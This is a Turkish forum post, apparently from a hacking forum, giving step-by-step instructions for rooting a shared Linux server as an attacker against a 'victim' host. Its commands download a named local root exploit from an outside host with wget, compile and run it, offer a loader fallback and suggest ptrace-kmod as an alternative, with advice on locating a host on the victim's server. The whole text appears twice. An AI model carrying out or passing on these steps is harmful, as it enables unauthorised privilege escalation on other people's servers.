A
Arsenik-tht
Ziyaretçi
Linux sistemlerinde yetkili duruma gelmek rootlamak???
Burada kullanacğımız exploit Local exploittir…Bu tür local saldırılar size bi kardes tavsiyesi kendinize bir ftp almak ama kurbanın hostununda aynı serverda bulunması gerekior… bunu nasıl bulcaz diosanız www.netcraft.com gibi sitelerden hostlara info çekerek şirket isimlerini görmek ki orada linklerde veriliyor…ya domaini whois cekmek www.register.com gibi sitelerden bakabilirsiniz…
Öncelikle bizim dosyalarımızı yazabileceğimiz rahat çalışabileceğimiz bir dizine yani o sıradaki yapılan işlemlerin yazılabileceği bir dizine ihtiyacımız var… nedir diye sorduğunuzu duyar gibiyim…
Tmp dizini yeterli olur herhalde sorunuza devam ediyoruz…
$ cd /tmp
Pwd yapıyoruz…
$ pwd
/tmp (diye bir şey gelecek muhtemelen bizim o dizinde olduğumuzu söylüyor
)
Tamam hemen yetkilere göz atıyoruz…
$ id
uid=55554(nobody) gid=55554(nobody) groups=55554(nobody)
bu demektirki bir biz bir hiçiz
emin olmak için;
$ whoami
nobody
evet artık emin olduk hiç bir şeyiz hemen exploitimizi çekiyoruz…
$ wget http://example.com/hatorihanzo.c
Download işlemi bittikten sonra hemen;
$ ls
hatorihanzo.c
bu dosyayı gördüyseniz sorun yok demektir.Hemen bu exploiti derleyelim…
$ gcc hatorihanzo.c -o hatorihanzo
Hemen bu exploite çalışma izni verelim (chmod 7777 yapalım yani)
$ chmod +x hatorihanzo
İzin kabul edilmiştir işte geldik kader anına exploiti çalıştıracaz ve exploit sistemi rootlamaya çalısacak…
$ ./ hatorihanzo
Eğer “$” işareti “#” olmuşsa sistemi rootlamışsınızdır…Olmadımı?
Sizimi kırıcam hemen dosya desteği istiyoruz…
$ /lib/ld-linux.so.2 ./hatorihanzo
Root olmuşsanız yani “$” “#” olmuşsa gerisi sizin vicdanınza kalmış olmamışsa değişik exploitleri kullanın örnek; ptrace-kmod Kolay gelsin…
Not: bu sistemden cıktığınızda her girdiğinizde aynı işlemleri tekrar gerçekleştirerek yine [root] olabilirsiniz…
Burada kullanacğımız exploit Local exploittir…Bu tür local saldırılar size bi kardes tavsiyesi kendinize bir ftp almak ama kurbanın hostununda aynı serverda bulunması gerekior… bunu nasıl bulcaz diosanız www.netcraft.com gibi sitelerden hostlara info çekerek şirket isimlerini görmek ki orada linklerde veriliyor…ya domaini whois cekmek www.register.com gibi sitelerden bakabilirsiniz…
Öncelikle bizim dosyalarımızı yazabileceğimiz rahat çalışabileceğimiz bir dizine yani o sıradaki yapılan işlemlerin yazılabileceği bir dizine ihtiyacımız var… nedir diye sorduğunuzu duyar gibiyim…
Tmp dizini yeterli olur herhalde sorunuza devam ediyoruz…
$ cd /tmp
Pwd yapıyoruz…
$ pwd
/tmp (diye bir şey gelecek muhtemelen bizim o dizinde olduğumuzu söylüyor
Tamam hemen yetkilere göz atıyoruz…
$ id
uid=55554(nobody) gid=55554(nobody) groups=55554(nobody)
bu demektirki bir biz bir hiçiz
$ whoami
nobody
evet artık emin olduk hiç bir şeyiz hemen exploitimizi çekiyoruz…
$ wget http://example.com/hatorihanzo.c
Download işlemi bittikten sonra hemen;
$ ls
hatorihanzo.c
bu dosyayı gördüyseniz sorun yok demektir.Hemen bu exploiti derleyelim…
$ gcc hatorihanzo.c -o hatorihanzo
Hemen bu exploite çalışma izni verelim (chmod 7777 yapalım yani)
$ chmod +x hatorihanzo
İzin kabul edilmiştir işte geldik kader anına exploiti çalıştıracaz ve exploit sistemi rootlamaya çalısacak…
$ ./ hatorihanzo
Eğer “$” işareti “#” olmuşsa sistemi rootlamışsınızdır…Olmadımı?
Sizimi kırıcam hemen dosya desteği istiyoruz…
$ /lib/ld-linux.so.2 ./hatorihanzo
Root olmuşsanız yani “$” “#” olmuşsa gerisi sizin vicdanınza kalmış olmamışsa değişik exploitleri kullanın örnek; ptrace-kmod Kolay gelsin…
Not: bu sistemden cıktığınızda her girdiğinizde aynı işlemleri tekrar gerçekleştirerek yine [root] olabilirsiniz…